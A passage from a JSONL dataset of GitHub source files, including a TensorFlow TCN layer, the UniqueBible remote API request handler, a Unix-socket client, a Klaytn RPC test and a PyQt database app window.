`return res`: 最後に、結果のリスト `res` を返します。\n\nこの関数は、行列の外周から開始して、中央に向かって螺旋状に要素を読み取り、それを結果のリストに追加していきます。\n\"\"\"","repo_name":"majikojima/neetcode","sub_path":"17_MathAndGeometry/04_SpiralMatrix.py","file_name":"04_SpiralMatrix.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26105942972","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#================================================================\n# God Bless You.\n#\n# file name: tcn.py\n# author: klaus\n# email: klaus.cheng@qq.com\n# created date: 2018/08/13\n# description: ref to https://medium.com/the-artificial-impos\n# tor/notes-understanding-tensorflow-part-3-7f66\n# 33fcc7c7\n#\n#================================================================\n\nimport tensorflow as tf\nfrom .nn import CausalConv1D\n\n\nclass TemporalBlock(tf.layers.Layer):\n def __init__(self,\n n_outputs,\n kernel_size,\n strides,\n dilation_rate,\n dropout=0.2,\n trainable=True,\n name=None,\n dtype=None,\n activity_regularizer=None,\n **kwargs):\n super(TemporalBlock, self).__init__(\n trainable=trainable,\n dtype=dtype,\n activity_regularizer=activity_regularizer,\n name=name,\n **kwargs)\n self.dropout = dropout\n self.n_outputs = n_outputs\n self.conv1 = CausalConv1D(\n n_outputs,\n kernel_size,\n strides=strides,\n dilation_rate=dilation_rate,\n activation=tf.nn.relu,\n name=\"conv1\")\n self.conv2 = CausalConv1D(\n n_outputs,\n kernel_size,\n strides=strides,\n dilation_rate=dilation_rate,\n activation=tf.nn.relu,\n name=\"conv2\")\n self.down_sample = None\n\n def build(self, input_shape):\n channel_dim = 2\n self.dropout1 = tf.layers.Dropout(\n self.dropout,\n [tf.constant(1),\n tf.constant(1),\n tf.constant(self.n_outputs)])\n self.dropout2 = tf.layers.Dropout(\n self.dropout,\n [tf.constant(1),\n tf.constant(1),\n tf.constant(self.n_outputs)])\n if input_shape[channel_dim] != self.n_outputs:\n # self.down_sample = tf.layers.Conv1D(\n # self.n_outputs, kernel_size=1,\n # activation=None, data_format=\"channels_last\", padding=\"valid\")\n self.down_sample = tf.layers.Dense(self.n_outputs, activation=None)\n\n def call(self, inputs, training=True):\n x = self.conv1(inputs)\n x = tf.contrib.layers.layer_norm(x)\n x = self.dropout1(x, training=training)\n x = self.conv2(x)\n x = tf.contrib.layers.layer_norm(x)\n x = self.dropout2(x, training=training)\n if self.down_sample is not None:\n inputs = self.down_sample(inputs)\n return tf.nn.relu(x + inputs)\n\n\nclass TemporalConvNet(tf.layers.Layer):\n def __init__(self,\n num_channels,\n kernel_size=2,\n dropout=0.2,\n trainable=True,\n name=None,\n dtype=None,\n activity_regularizer=None,\n **kwargs):\n super(TemporalConvNet, self).__init__(\n trainable=trainable,\n dtype=dtype,\n activity_regularizer=activity_regularizer,\n name=name,\n **kwargs)\n self.layers = []\n num_levels = len(num_channels)\n for i in range(num_levels):\n dilation_size = 2**i\n out_channels = num_channels[i]\n self.layers.append(\n TemporalBlock(\n out_channels,\n kernel_size,\n strides=1,\n dilation_rate=dilation_size,\n dropout=dropout,\n name=\"tblock_{}\".format(i)))\n\n def call(self, inputs, training=True):\n outputs = inputs\n for layer in self.layers:\n outputs = layer(outputs, training=training)\n return 
outputs\n","repo_name":"beforeifall/lip","sub_path":"lipreading/model/tcn/tcn.py","file_name":"tcn.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6405795225","text":"import base64\nimport glob\nimport hashlib\nimport json\nimport logging\nimport os\nimport re\nimport urllib\nfrom datetime import datetime, timezone\nfrom pathlib import Path\n\nimport config\nfrom http import HTTPStatus\n\nfrom http.server import SimpleHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\nfrom db.BiblesSqlite import BiblesSqlite, Bible, MorphologySqlite\nfrom db.DevotionalSqlite import DevotionalSqlite\nfrom db.ToolsSqlite import Commentary, LexiconData, IndexesSqlite, Book, Lexicon, CrossReferenceSqlite, DictionaryData, \\\n SearchSqlite, VerseData\nfrom util.BibleBooks import BibleBooks\nfrom util.BibleVerseParser import BibleVerseParser\nfrom util.CatalogUtil import CatalogUtil\nfrom util.LexicalData import LexicalData\n\n\nclass ApiRequestHandler(SimpleHTTPRequestHandler):\n def list_directory(self, path):\n self.send_error(\n HTTPStatus.NOT_FOUND,\n \"Not found\")\n return None\n\nclass RemoteApiHandler(ApiRequestHandler):\n\n jsonData = {}\n\n ONE_SEC = \"1\"\n ONE_HOUR = \"3600\"\n ONE_DAY = \"86400\"\n ONE_MONTH = \"2592000\"\n ONE_YEAR = \"31536000\"\n\n def __init__(self, *args, **kwargs):\n self.logger = logging.getLogger('uba')\n config.internet = True\n config.showHebrewGreekWordAudioLinks = False\n try:\n super().__init__(*args, directory=\"htmlResources\", **kwargs)\n except Exception as ex:\n print(\"Could not run init\")\n print(ex)\n\n def do_POST(self):\n self.handleBadRequests()\n\n def do_HEAD(self):\n self.handleBadRequests()\n\n def handleBadRequests(self):\n self.jsonData = {'status': 'Error', 'message': 'Unsupported method'}\n self.sendJsonData()\n\n def do_OPTIONS(self):\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header(\"Access-Control-Allow-Headers\", '*')\n self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')\n self.end_headers()\n\n def sendJsonData(self):\n data = json.dumps(self.jsonData)\n self.commonHeader()\n self.wfile.write(bytes(data, \"utf8\"))\n\n def commonHeader(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/json\")\n self.send_header(\"charset\", \"UTF-8\")\n self.send_header(\"Pragma\", \"no-cache\"),\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.send_header(\"Cache-Control\", \"max-age=\" + RemoteApiHandler.ONE_DAY + \", stale-while-revalidate=\" + RemoteApiHandler.ONE_DAY),\n self.end_headers()\n\n def sendError(self, message):\n self.jsonData = {'status': 'Error', 'message': message}\n\n def do_GET(self):\n try:\n self.clientIP = self.client_address[0]\n self.processRequest(self.path)\n except Exception as ex:\n self.jsonData = {'status': 'Error', 'exception': str(ex)}\n self.sendJsonData()\n\n def processRequest(self, request):\n self.securityCheck()\n query = parse_qs(urlparse(request).query)\n self.jsonData = {'status': \"OK\"}\n if \"?\" in request:\n request = request.split(\"?\")[0]\n self.jsonData['request'] = request\n config.marvelData = 'marvelData'\n if query:\n self.jsonData['query'] = query\n if \"lang\" in query.keys():\n lang = query[\"lang\"][0]\n if os.path.exists('marvelData_' + lang):\n config.marvelData = 'marvelData_' + lang\n cmd = request[1:].split(\"/\")\n if len(cmd) > 0:\n command = cmd[0].lower()\n if 
command == \"data\":\n self.processDataCommand(cmd, query)\n elif command == \"list\":\n self.processListCommand(cmd)\n elif command == \"bible\":\n self.processBibleCommand(cmd)\n elif command == \"compare\":\n self.processCompareCommand(cmd, query)\n elif command == \"book\":\n self.processBookCommand(cmd)\n elif command == \"commentary\":\n self.processCommentaryCommand(cmd)\n elif command == \"lexicon\":\n self.processLexiconCommand(cmd)\n elif command == \"lexiconreverse\":\n self.processLexiconReverseCommand(cmd)\n elif command == \"devotional\":\n self.processDevotionalCommand(cmd)\n elif command == \"dictionary\":\n self.processDictionaryCommand(cmd)\n elif command == \"crossreference\":\n self.processCrossReferenceCommand(cmd)\n elif command == \"crossreference\":\n self.processCrossReferenceCommand(cmd)\n elif command == \"search\":\n self.processSearchCommand(cmd, query)\n elif command == \"morphology\":\n self.processMorphologyCommand(cmd)\n elif command == \"searchtool\":\n self.processSearchToolCommand(cmd)\n elif command == \"discourse\":\n self.processDiscourseCommand(cmd)\n\n # /data/bible/abbreviations?lang=[eng,sc,tc]\n # /data/bible/book2number?lang=[eng,sc,tc]\n # /data/bible/chapters\n # /data/bible/verses\n # /data/bible/books/TRLIT\n # /data/lex/H3068\n def processDataCommand(self, cmd, query):\n if cmd[1].lower() == \"bible\":\n if cmd[2].lower() == \"abbreviations\":\n lang = \"eng\"\n if query and \"lang\" in query.keys():\n lang = query[\"lang\"][0]\n data = []\n for key, value in BibleBooks().abbrev[lang].items():\n data.append({'i': key, 'a': value[0], 'n': value[1]})\n self.jsonData['data'] = data\n elif cmd[2].lower() == \"book2number\":\n lang = \"eng\"\n if query and \"lang\" in query.keys():\n lang = query[\"lang\"][0]\n data = []\n for key, value in BibleBooks.name2number.items():\n data.append({'b': key, 'n': value})\n self.jsonData['data'] = data\n elif cmd[2].lower() == \"chapters\":\n self.jsonData['data'] = BibleBooks.chapters\n elif cmd[2].lower() == \"verses\":\n self.jsonData['data'] = BibleBooks.verses\n elif cmd[2].lower() == \"books\":\n self.jsonData['data'] = [book for book in BiblesSqlite().getBookList(cmd[3])]\n elif cmd[1].lower() == \"lex\":\n self.jsonData['data'] = LexicalData.getLexicalDataRaw(cmd[2])\n\n def securityCheck(self):\n if config.apiServerClientId == '':\n return\n else:\n clients = {config.apiServerClientId: {'secret': self.encodeSecret(config.apiServerClientSecret)}}\n auth = self.headers['Authorization']\n if auth:\n basic, creds = auth.split()\n clientId, clientSecret = base64.b64decode(creds).decode().split(':')\n if clientId in clients.keys():\n if clientSecret == clients[clientId]['secret']:\n return\n raise Exception('Unauthorized')\n\n def encodeSecret(self, secret):\n secret = secret + str(datetime.now(timezone.utc).month)\n secret = hashlib.md5(secret.encode())\n secret = secret.hexdigest()\n return secret\n\n # /bible\n # /bible/KJV/43/3\n # /bible/KJV/44/3/16\n def processBibleCommand(self, cmd):\n if len(cmd) == 1:\n self.jsonData['data'] = [bible for bible in BiblesSqlite().getBibleList()]\n return\n elif len(cmd) < 4:\n self.sendError(\"Invalid Bible command\")\n return\n if len(cmd) == 4:\n if cmd[1] in [\"MOB\", \"MAB\", \"MIB\", \"MPB\", \"MTB\"]:\n book, chapter, scripture = Bible(cmd[1]).readTextChapterRaw(cmd[2], cmd[3])\n data = re.findall(\"(.*?)\", scripture)\n verses = []\n count = 1\n for passage in data:\n verses.append([cmd[2], cmd[3], count, passage])\n count += 1\n else:\n verses = 
BiblesSqlite().readTextChapter(cmd[1], cmd[2], cmd[3])\n elif len(cmd) == 5:\n verses = [BiblesSqlite().readTextVerse(cmd[1], cmd[2], cmd[3], cmd[4])]\n rows = []\n for verse in verses:\n rows.append({'b': verse[0], 'c': verse[1], 'v': verse[2], 't': verse[3]})\n self.jsonData['data'] = rows\n\n # /book\n # /book/Hymn+Lyrics+-+English\n # /book/Hymn+Lyrics+-+English/Amazing+Grace\n def processBookCommand(self, cmd):\n CatalogUtil.reloadLocalCatalog()\n if len(cmd) == 1:\n self.jsonData['data'] = [book for book in CatalogUtil.getBooks()]\n return\n elif len(cmd) < 2:\n self.sendError(\"Invalid Book command\")\n return\n module = cmd[1].replace(\"+\", \" \")\n module = module.replace(\"?\", \"?\")\n module = urllib.parse.unquote(module)\n if len(cmd) == 2:\n self.jsonData['data'] = [topic for topic in Book(module).getTopicList()]\n else:\n chapter = cmd[2].replace(\"+\", \" \")\n chapter = chapter.replace(\"?\", \"?\")\n chapter = urllib.parse.unquote(chapter)\n # chapter = chapter.replace(\"%3C\", \"<\")\n # chapter = chapter.replace(\"%3E\", \">\")\n data = Book(module).getContentByChapter(chapter)\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /commentary/ABC/43/1\n def processCommentaryCommand(self, cmd):\n config.commentariesFolder = os.path.join(config.marvelData, \"commentaries\")\n if len(cmd) == 1:\n self.jsonData['data'] = [commentary for commentary in Commentary().getCommentaryList()]\n return\n elif len(cmd) < 4:\n self.sendError(\"Invalid Commentary command\")\n return\n commentary = urllib.parse.unquote(cmd[1])\n data = Commentary(commentary).getRawContent(cmd[2], cmd[3])\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /lexicon\n # /lexicon/TBESG/G5\n def processLexiconCommand(self, cmd):\n CatalogUtil.reloadLocalCatalog()\n if len(cmd) == 1:\n self.jsonData['data'] = [lexicon for lexicon in LexiconData().lexiconList]\n return\n elif len(cmd) < 3:\n self.sendError(\"Invalid Lexicon command\")\n return\n data = Lexicon(cmd[1]).getRawContent(cmd[2])\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /lexiconreverse\n # /lexiconreverse/TRLIT/love\n def processLexiconReverseCommand(self, cmd):\n CatalogUtil.reloadLocalCatalog()\n if len(cmd) == 1:\n self.jsonData['data'] = [lexicon for lexicon in LexiconData().lexiconList]\n return\n elif len(cmd) < 3:\n self.sendError(\"Invalid Lexicon command\")\n return\n data = Lexicon(cmd[1]).getRawReverseContent(cmd[2])\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /devotional\n # /devotional/Chambers+-+My+Utmost+For+His+Highest/12/25\n def processDevotionalCommand(self, cmd):\n if len(cmd) == 1:\n self.jsonData['data'] = [Path(devotional).stem for devotional in sorted(glob.glob(os.path.join(config.marvelData, \"devotionals\", \"*.devotional\")))]\n return\n elif len(cmd) < 4:\n self.sendError(\"Invalid Lexicon command\")\n return\n devotional = cmd[1].replace(\"+\", \" \")\n self.jsonData['data'] = DevotionalSqlite(devotional).getEntry(cmd[2], cmd[3])\n\n # /dictionary\n # /dictionary/search/FAU/temple\n # /dictionary/content/FAU3650\n def processDictionaryCommand(self, cmd):\n if len(cmd) == 1:\n self.jsonData['data'] = [dictionary[0] for dictionary in IndexesSqlite().dictionaryList]\n return\n elif len(cmd) < 3:\n self.sendError(\"Invalid Dictionary command\")\n return\n if cmd[1].lower() == \"search\":\n self.jsonData['data'] = {'exact': SearchSqlite().getContent(cmd[2], cmd[3]),\n 'similar': SearchSqlite().getSimilarContent(cmd[2], cmd[3])}\n elif 
cmd[1].lower() == \"content\":\n self.jsonData['data'] = DictionaryData().getRawContent(cmd[2])\n\n # /crossreference/1/1/1\n # /crossreference/1/1/1/KJV\n def processCrossReferenceCommand(self, cmd):\n if len(cmd) < 4:\n self.sendError(\"Invalid Cross Reference command\")\n return\n data = CrossReferenceSqlite().getCrossReferenceList((cmd[1], cmd[2], cmd[3]))\n if len(cmd) == 4:\n self.jsonData['data'] = data\n else:\n versesData = []\n verses = BibleVerseParser(config.parserStandarisation).extractAllReferencesFast(data)\n text = cmd[4]\n for (b, c, v, *_) in verses:\n record = Bible(text).readTextVerse(b, c, v)\n versesData.append(record)\n self.jsonData['data'] = versesData\n\n # /compare/1/1/1?text=KJV&text=TRLIT&text=WEB\n def processCompareCommand(self, cmd, query):\n if len(cmd) < 4:\n self.sendError(\"Invalid Compare command\")\n return\n if query:\n texts = query[\"text\"]\n else:\n texts = ['KJV']\n self.jsonData['data'] = BiblesSqlite().compareVerseRaw((cmd[1], cmd[2], cmd[3]), texts)\n\n # /search?searchText=faith\n def processSearchCommand(self, cmd, query):\n try:\n searchText = query[\"searchText\"][0]\n type = query[\"type\"][0] if \"type\" in query.keys() else \"bible\"\n if type == \"bible\":\n text = query[\"text\"][0] if \"text\" in query.keys() else \"KJV\"\n query = \"SELECT Book, Chapter, Verse, Scripture FROM Verses \"\n query += \"WHERE \"\n query += \"(Scripture LIKE ?) \"\n query += \"ORDER BY Book, Chapter, Verse \"\n query += \"LIMIT 5000 \"\n if '\"' in searchText:\n searchText = searchText.replace('\"', '')\n else:\n searchText = searchText.replace(\" \", \"%\").replace(\"+\", \"%\")\n t = (\"%{0}%\".format(searchText),)\n verses = Bible(text).getSearchVerses(query, t)\n\n self.jsonData['data'] = verses\n except Exception as ex:\n self.sendError(\"Invalid search command - \" + ex)\n\n # /morphology/1/34684\n def processMorphologyCommand(self, cmd):\n if len(cmd) < 3:\n self.sendError(\"Invalid Morphology command\")\n return\n morphologySqlite = MorphologySqlite()\n wordID, clauseID, b, c, v, textWord, lexicalEntry, morphologyCode, morphology, lexeme, transliteration, pronuciation, interlinear, translation, gloss = morphologySqlite.searchWordRaw(cmd[1], cmd[2])\n lexicalEntry = lexicalEntry.split(\",\")[0]\n translations = morphologySqlite.distinctMorphology(lexicalEntry)\n self.jsonData['data'] = (textWord, lexeme, lexicalEntry, morphologyCode, morphology, transliteration, pronuciation, interlinear, translation, gloss, translations)\n\n # /searchtool/mETCBC/adjv.f.pl.a\n def processSearchToolCommand(self, cmd):\n try:\n data = SearchSqlite().getContent(cmd[1], cmd[2])\n self.jsonData['data'] = data\n except Exception as ex:\n self.sendError(\"Invalid search command - \" + ex)\n\n # /discourse/1/1/1\n def processDiscourseCommand(self, cmd):\n try:\n verseData = VerseData(\"discourse\")\n data = verseData.getContent((int(cmd[1]), int(cmd[2]), int(cmd[3])))\n self.jsonData['data'] = data\n except Exception as ex:\n self.sendError(\"Invalid discourse command - \" + ex)\n","repo_name":"eliranwong/UniqueBible","sub_path":"util/RemoteApiHandler.py","file_name":"RemoteApiHandler.py","file_ext":"py","file_size_in_byte":15952,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"22547398402","text":"#!/usr/bin/env python\n\nimport datetime\nimport time\nimport sys\nimport struct\nimport common_py2 as com2\n\nADDRESS = '/tmp/usock.sock' \nBUFSIZE = 4096\n\nserver = com2.UnixSocket(ADDRESS, BUFSIZE)\n\ndef 
clientMain():\n data = 0\n msg = 0\n while True:\n time.sleep(0.1)\n msg = struct.pack('B',data)\n msg += struct.pack('B',data+1)\n data += 1\n if data >254:\n data = 0\n server.client_send(msg)\n now = datetime.datetime.now()\n print('[client]Send:message={0} [{1}]'.format(msg.encode('hex'), now))\n\nif __name__ == '__main__':\n try:\n clientMain()\n except KeyboardInterrupt:\n print('[client]closed.')\n sys.exit(1)\n\n","repo_name":"zuky88/Connect_Python3_and_Python2","sub_path":"client_py2.py","file_name":"client_py2.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16463126813","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestGetRewardsAccumulated(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.firstBlock = 123400489\n self.lastBlock = 123416489\n\n def test_post(self):\n self.response = self.w3.governance.governance_get_rewards_accumulated(\n self.firstBlock, self.lastBlock\n )\n self.assertIsInstance(self.response['totalMinted'], int)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/governance/test_get_rewards_accumulated.py","file_name":"test_get_rewards_accumulated.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"44119987858","text":"\"\"\"\n Главное окно АИС \"ГСП Ремонт\"\n\"\"\"\n\nimport sys\nimport os\n\nfrom PyQt6 import uic\nfrom PyQt6 import QtWidgets, QtGui\n\nfrom src.general_modules.resoursedir import DirUi, DirFont\nfrom src.general_modules.resourseuser import AdminUser\nfrom src.general_modules.connectDB import ConnectDb\n\nfrom src.managementDB_modules.manager_gen_cmd import ManagerDBCmd\n\n\nclass AppMain(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.data_con = None\n self.con_db = None\n self.table_manager_cmd = None\n\n # Путь к файлу (элементу) интерфейса\n file_path = DirUi.MAIN_WINDOW.value\n\n # Загрузка файла (элемента) интерфейса\n uic.loadUi(os.path.join(*file_path), self)\n\n # Подзаголовочное меню \"Подключение\"\n self.actBDcmda.triggered.connect(self.act_connectdb_cmd) # Меню \"Подключить БД КИПиА\"\n self.actExit.triggered.connect(self.act_exit) # Меню \"Выход\"\n\n # Подзаголовочное меню \"Редактирование БД\"\n self.actGenCmd.triggered.connect(self.act_managerdb_cmd) # Меню \"Общие сведения о КИП\"\n\n # Обработчики меню \"Подключение\"\n # Меню \"Подключить БД КИПиА\"\n def act_connectdb_cmd(self):\n self.data_con = AdminUser.MAIN_AKK.value\n self.con_db = ConnectDb('gspcoast', *self.data_con)\n self.con_db.connect_db()\n\n # Меню \"Выход\"\n def act_exit(self):\n self.con_db.close_db()\n app.quit()\n\n # Обработчики меню \"Редактирование БД\"\n # Меню \"Общие сведения о КИП\"\n def act_managerdb_cmd(self):\n self.table_manager_cmd = ManagerDBCmd()\n\n\n\n\n# Запуск Главного окна программы\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n\n # Установка стиля отображения интерфейса\n app.setStyle('Fusion')\n\n # Установка основного шрифта приложения\n font_path = DirFont.MAIN_FONT.value\n QtGui.QFontDatabase.addApplicationFont(os.path.join(*font_path))\n\n window = AppMain()\n window.showMaximized()\n window.show()\n 
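# Note (added): app.exec() enters the Qt event loop and returns its exit code once the application quits; sys.exit() below propagates that code to the shell.\n    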
sys.exit(app.exec())\n","repo_name":"peterkurzzz/gspcoast","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26524541837","text":"import ujson as json\nfrom bamboo_engine.eri import ContextValue, ContextValueType\n\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.http.response import JsonResponse\n\nfrom gcloud.core.models import EngineConfig\nfrom gcloud.utils.handlers import handle_plain_log\nfrom pipeline.engine.models import PipelineModel, PipelineProcess, Status, ScheduleService\nfrom pipeline.core.pipeline import PipelineShell\nfrom pipeline.engine.utils import calculate_elapsed_time\nfrom pipeline.core.data.var import Variable\nfrom pipeline.eri.runtime import BambooDjangoRuntime\nfrom pipeline.service import task_service\nfrom pipeline.core.flow.activity import Activity\nfrom pipeline.core.flow.gateway import Gateway\nfrom pipeline.core.flow.event import StartEvent, EndEvent\nfrom gcloud.taskflow3.models import TaskFlowInstance\nfrom gcloud.taskflow3.domains.context import TaskContext\nfrom gcloud.iam_auth.intercept import iam_intercept\nfrom gcloud.iam_auth.view_interceptors.admin import AdminEditViewInterceptor, AdminViewViewInterceptor\n\nSERIALIZE_DATE_FORMAT = \"%Y-%m-%d %H:%M:%S %Z\"\n\n\ndef format_variables_value(var_value):\n if isinstance(var_value, TaskContext):\n return var_value.__dict__\n\n return var_value\n\n\ndef format_variables(variables):\n _vars = {}\n for key, var in variables.items():\n if isinstance(var, Variable):\n _vars[key] = {\"name\": var.name, \"value\": format_variables_value(var.value)}\n elif isinstance(var, TaskContext):\n _vars[key] = {\"name\": key, \"value\": var.__dict__}\n else:\n _vars[key] = var\n\n return _vars\n\n\ndef serialize_pipeline_context(context):\n return {\n \"variables\": format_variables(context.variables),\n \"act_outputs\": context.act_outputs,\n \"_output_key\": context._output_key,\n \"_change_keys\": getattr(context, \"_change_keys\"),\n \"_raw_variables\": format_variables(getattr(context, \"_raw_variables\", {})),\n }\n\n\ndef serialize_process_data(process):\n def serialize(process):\n data = {\n \"id\": process.id,\n \"root_pipeline_id\": process.root_pipeline_id,\n \"current_node_id\": process.current_node_id,\n \"destination_id\": process.destination_id,\n \"parent_id\": process.parent_id,\n \"ack_num\": process.ack_num,\n \"need_ack\": process.need_ack,\n \"is_alive\": process.is_alive,\n \"is_sleep\": process.is_sleep,\n \"is_frozen\": process.is_frozen,\n \"children\": process.children,\n \"child_process\": {},\n \"subprocess_stack\": process.subprocess_stack,\n \"context\": None,\n \"subprocess_context\": {},\n }\n\n if process.snapshot:\n data[\"in_subprocess\"] = process.in_subprocess\n\n if process.root_pipeline:\n if isinstance(process.root_pipeline, PipelineShell):\n data[\"context\"] = \"can not get context from PipelineShell\"\n else:\n data[\"context\"] = serialize_pipeline_context(process.root_pipeline.context)\n\n if process.pipeline_stack:\n for pipeline in process.pipeline_stack[:-1]:\n data[\"subprocess_context\"][pipeline.id] = serialize_pipeline_context(pipeline.context)\n\n if process.children:\n for child in PipelineProcess.objects.filter(parent_id=process.id):\n data[\"child_process\"][child.id] = serialize(child)\n\n return data\n\n return 
serialize(process)\n\n\n@require_GET\n@iam_intercept(AdminViewViewInterceptor())\ndef get_taskflow_v1_detail(request):\n task_id = request.GET.get(\"task_id\")\n\n try:\n taskflow = TaskFlowInstance.objects.get(id=task_id)\n except TaskFlowInstance.DoesNotExist:\n return {\"result\": False, \"message\": f\"task {task_id} not exist\"}\n\n if taskflow.engine_ver != EngineConfig.ENGINE_VER_V1:\n return JsonResponse(\n {\"result\": False, \"message\": f\"only support task with engine version {EngineConfig.ENGINE_VER_V1}\"}\n )\n\n process_data = \"pipeline not run\"\n if taskflow.pipeline_instance.is_started:\n engine_model = PipelineModel.objects.get(id=taskflow.pipeline_instance.instance_id)\n process_data = serialize_process_data(engine_model.process)\n\n return JsonResponse({\"result\": True, \"data\": process_data})\n\n\ndef hydrate_inputs(inputs):\n hydrated = {}\n for k, v in inputs.items():\n if isinstance(v, Variable):\n hydrated[k] = {\"repr\": f\"{v}\", \"name\": v.name, \"value\": v.value}\n else:\n hydrated[k] = v\n\n return hydrated\n\n\n@require_GET\n@iam_intercept(AdminViewViewInterceptor())\ndef get_taskflow_v1_node_detail(request):\n task_id = request.GET.get(\"task_id\")\n node_id = request.GET.get(\"node_id\")\n subprocess_stack = json.loads(request.GET.get(\"subprocess_stack\", \"[]\"))\n\n data = {\n \"execution_info\": {},\n \"inputs\": \"pipeline has been destoryed\",\n \"outputs\": \"pipeline has been destoryed\",\n \"history\": {},\n \"log\": \"\",\n \"ex_data\": \"\",\n }\n\n taskflow = TaskFlowInstance.objects.get(id=task_id)\n\n if taskflow.engine_ver != EngineConfig.ENGINE_VER_V1:\n return JsonResponse(\n {\"result\": False, \"message\": f\"only support task with engine version {EngineConfig.ENGINE_VER_V1}\"}\n )\n\n if not taskflow.pipeline_instance.is_started:\n return JsonResponse({\"result\": False, \"message\": f\"task[{task_id}] is not start\"})\n\n if not taskflow.has_node(node_id):\n return JsonResponse({\"result\": False, \"message\": f\"task[{task_id}] does not have node[{node_id}]\"})\n\n status = Status.objects.get(id=node_id)\n\n # collect execution info\n data[\"execution_info\"] = {\n \"name\": status.name,\n \"start_time\": status.started_time.strftime(SERIALIZE_DATE_FORMAT) if status.started_time else None,\n \"archive_time\": status.archived_time.strftime(SERIALIZE_DATE_FORMAT) if status.archived_time else None,\n \"elapsed_time\": calculate_elapsed_time(status.started_time, status.archived_time),\n \"skip\": status.skip,\n \"error_ignorable\": status.error_ignorable,\n \"retry_times\": status.retry,\n \"id\": status.id,\n \"state\": status.state,\n \"loop\": status.loop,\n \"create_time\": status.created_time,\n \"version\": status.version,\n \"schedule_id\": None,\n \"is_scheduling\": False,\n \"schedule_times\": 0,\n \"wait_callback\": False,\n \"is_finished\": False,\n \"schedule_version\": None,\n \"callback_data\": None,\n }\n\n try:\n schedule = ScheduleService.objects.schedule_for(status.id, status.version)\n except ScheduleService.DoesNotExist:\n pass\n else:\n data[\"execution_info\"].update(\n {\n \"schedule_id\": schedule.id,\n \"is_scheduling\": schedule.is_scheduling,\n \"schedule_times\": schedule.schedule_times,\n \"wait_callback\": schedule.wait_callback,\n \"is_finished\": schedule.is_finished,\n \"schedule_version\": schedule.version,\n \"callback_data\": schedule.callback_data,\n }\n )\n\n # collect inputs and outputs\n\n process = PipelineModel.objects.get(id=taskflow.pipeline_instance.instance_id).process\n\n # only process 
activity's inputs and outputs\n if process.root_pipeline:\n\n target_pipeline = process.root_pipeline\n for sub_id in subprocess_stack:\n subprocess_act = [x for x in target_pipeline.spec.activities if x.id == sub_id][0]\n target_pipeline = subprocess_act.pipeline\n\n node = target_pipeline.spec.objects[node_id]\n\n if isinstance(node, Activity):\n data[\"inputs\"] = hydrate_inputs(node.data.inputs)\n data[\"outputs\"] = node.data.outputs\n\n elif isinstance(node, Gateway):\n data[\"inputs\"] = data[\"outputs\"] = \"gateway object does not have data\"\n\n elif isinstance(node, StartEvent):\n data[\"inputs\"] = data[\"outputs\"] = \"start event object does not have data\"\n\n elif isinstance(node, EndEvent):\n data[\"inputs\"] = node.data.inputs\n data[\"outputs\"] = node.data.outputs\n\n elif taskflow.pipeline_instance.is_finished or taskflow.pipeline_instance.is_revoked:\n data[\"inputs\"] = data[\"outputs\"] = \"pipeline had finished or had been revoked\"\n\n # collect history\n data[\"history\"] = task_service.get_activity_histories(node_id)\n\n # collect log\n data[\"log\"] = handle_plain_log(task_service.get_plain_log_for_node(node_id))\n\n # set ex_data\n data[\"ex_data\"] = task_service.get_outputs(node_id)[\"ex_data\"]\n\n return JsonResponse({\"result\": True, \"data\": data})\n\n\n@require_GET\n@iam_intercept(AdminViewViewInterceptor())\ndef get_node_v1_history_log(request):\n node_id = request.GET.get(\"node_id\")\n history_id = request.GET.get(\"history_id\")\n\n data = {\"log\": handle_plain_log(task_service.get_plain_log_for_node(node_id, history_id))}\n\n return JsonResponse({\"result\": True, \"data\": data})\n\n\n@require_POST\n@iam_intercept(AdminEditViewInterceptor())\ndef upsert_taskflow_v2_context(request):\n data = json.loads(request.body)\n context = data.get(\"context\")\n task_id = data.get(\"task_id\")\n\n taskflow = TaskFlowInstance.objects.get(id=task_id)\n runtime = BambooDjangoRuntime()\n context_values = {\n key: ContextValue(key=key, type=ContextValueType.PLAIN, value=value) for key, value in context.items()\n }\n runtime.upsert_plain_context_values(pipeline_id=taskflow.pipeline_instance.instance_id, update=context_values)\n return JsonResponse({\"result\": True, \"message\": \"upsert taskflow_context done\"})\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/contrib/admin/views/taskflow.py","file_name":"taskflow.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"3276703832","text":"def stack_operation(stack_commands):\n ret = []\n for comm in stack_commands:\n if comm[0] == 'push':\n ret.append(comm[1])\n elif comm[0] == 'pop':\n ret.pop()\n elif comm[0] == 'show_max':\n print(max(ret))\n return ret\n \"\"\"\n Funkcja przyjmuję listę jedno i dwu 